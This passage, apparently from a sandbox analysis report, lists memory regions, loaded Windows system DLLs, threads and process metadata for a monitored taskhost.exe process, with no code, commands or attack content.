"cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3558 start_va = 0x1d40000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 3559 start_va = 0x1b20000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 3560 start_va = 0x1e00000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 3561 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 3562 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3563 start_va = 0x7fefb460000 end_va = 0x7fefb46afff monitored = 0 entry_point = 0x7fefb464f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3564 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3571 start_va = 0x7fefd460000 end_va = 0x7fefd46afff monitored = 0 entry_point = 0x7fefd461030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3572 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3573 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3574 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3575 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Thread: id = 400 os_tid = 0x43c Thread: id = 403 os_tid = 0x448 Thread: id = 405 os_tid = 0x454 Thread: id = 406 os_tid = 0x458 Thread: id = 410 os_tid = 0x468 Thread: id = 412 os_tid = 0x470 Process: id = "19" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x16ac1000" os_pid = "0x44c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000febd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3505 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3506 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3507 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3508 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3509 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3510 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3511 start_va = 0xff3b0000 end_va = 0xff3c3fff monitored = 0 entry_point = 0xff3b2ce0 region_type = mapped_file name = "taskhost.exe" filename = "\\Windows\\System32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe") Region: id = 3512 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3513 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3514 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3515 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3519 start_va = 0x1b0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3520 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3521 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3522 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3523 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3524 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3525 start_va = 0x40000 end_va = 0xa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3526 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3527 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3528 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3529 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3530 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3531 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3532 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3533 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3534 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3535 start_va = 0x2b0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3536 start_va = 0x3b0000 end_va = 0x537fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3537 start_va = 0x130000 end_va = 0x158fff monitored = 0 entry_point = 0x131010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3538 start_va = 0x130000 end_va = 0x158fff monitored = 0 entry_point = 0x131010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3539 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3540 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3541 start_va = 0x540000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3542 start_va = 0x6d0000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 3547 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhost.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhost.exe.mui") Region: id = 3548 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3549 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3567 start_va = 0x1ad0000 end_va = 0x1b4cfff monitored = 0 entry_point = 0x1adcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3568 start_va = 0x1ad0000 end_va = 0x1b4cfff monitored = 0 entry_point = 0x1adcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3569 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3570 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3576 start_va = 0x1bb0000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 3577 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3578 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3591 start_va = 0x1d80000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 3592 start_va = 0x7fefc0b0000 end_va = 0x7fefc105fff monitored = 0 entry_point = 0x7fefc0bbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3593 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3594 start_va = 0x1c30000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 3611 start_va = 0x1ad0000 end_va = 0x1baefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 3612 start_va = 0x7fefbca0000 end_va = 0x7fefbcb7fff monitored = 0 entry_point = 0x7fefbca1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3625 start_va = 0x1ef0000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 3626 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3630 start_va = 0x1f70000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 3631 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 3632 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3634 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3635 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 3636 start_va = 0x1cf0000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 3637 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3638 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3639 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3645 start_va = 0x7fefadb0000 end_va = 0x7fefadbafff monitored = 0 entry_point = 0x7fefadb48d8 region_type = mapped_file name = "hotstartuseragent.dll" filename = "\\Windows\\System32\\HotStartUserAgent.dll" (normalized: "c:\\windows\\system32\\hotstartuseragent.dll") Region: id = 3651 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3652 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3654 start_va = 0x1f70000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 3655 start_va = 0x2000000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 3656 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3657 start_va = 0x7fefacf0000 end_va = 0x7fefacfafff monitored = 0 entry_point = 0x7fefacf1290 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 3660 start_va = 0x7fefacb0000 end_va = 0x7fefacecfff monitored = 0 entry_point = 0x7fefacb1bdc region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 3661 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3662 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3672 start_va = 0x7fefac90000 end_va = 0x7fefaca7fff monitored = 0 entry_point = 0x7fefac91630 region_type = mapped_file name = "playsndsrv.dll" filename = "\\Windows\\System32\\PlaySndSrv.dll" (normalized: "c:\\windows\\system32\\playsndsrv.dll") Region: id = 3673 start_va = 0x21e0000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 3674 start_va = 0x7fefb460000 end_va = 0x7fefb46afff monitored = 0 entry_point = 0x7fefb464f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3675 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3676 start_va = 0x22f0000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 3677 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3678 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 3679 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3680 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3681 start_va = 0x180000 end_va = 0x180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msctfmonitor.dll.mui" filename = "\\Windows\\System32\\en-US\\MsCtfMonitor.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctfmonitor.dll.mui") Region: id = 3682 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3683 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3691 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3692 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3693 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3694 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3695 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3696 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3697 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3698 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3699 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3700 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3701 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3702 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3703 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3704 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3705 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3706 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3707 start_va = 0x1e00000 end_va = 0x1e7afff monitored = 0 entry_point = 0x1e5385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 3708 start_va = 0x1e00000 end_va = 0x1e3cfff monitored = 0 entry_point = 0x1e01070 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 3709 start_va = 0x190000 end_va = 0x195fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "input.dll.mui" filename = "\\Windows\\System32\\en-US\\input.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\input.dll.mui") Region: id = 3710 start_va = 0x190000 end_va = 0x1aefff monitored = 0 entry_point = 0x1a72ee region_type = mapped_file name = "sptip.dll" filename = "\\Windows\\IME\\SPTIP.DLL" (normalized: "c:\\windows\\ime\\sptip.dll") Region: id = 3711 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sptip.dll.mui" filename = "\\Windows\\IME\\en-US\\SpTip.dll.mui" (normalized: "c:\\windows\\ime\\en-us\\sptip.dll.mui") Region: id = 3712 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3714 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3719 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3720 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3721 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3722 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3723 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3724 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3725 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3726 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3727 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3728 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tabletextservice.dll.mui" filename = "\\Program Files\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui") Region: id = 3732 start_va = 0x1e00000 end_va = 0x1e5bfff monitored = 0 entry_point = 0x1e2bbbc region_type = mapped_file name = "tabletextservice.dll" filename = "\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll") Region: id = 3733 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 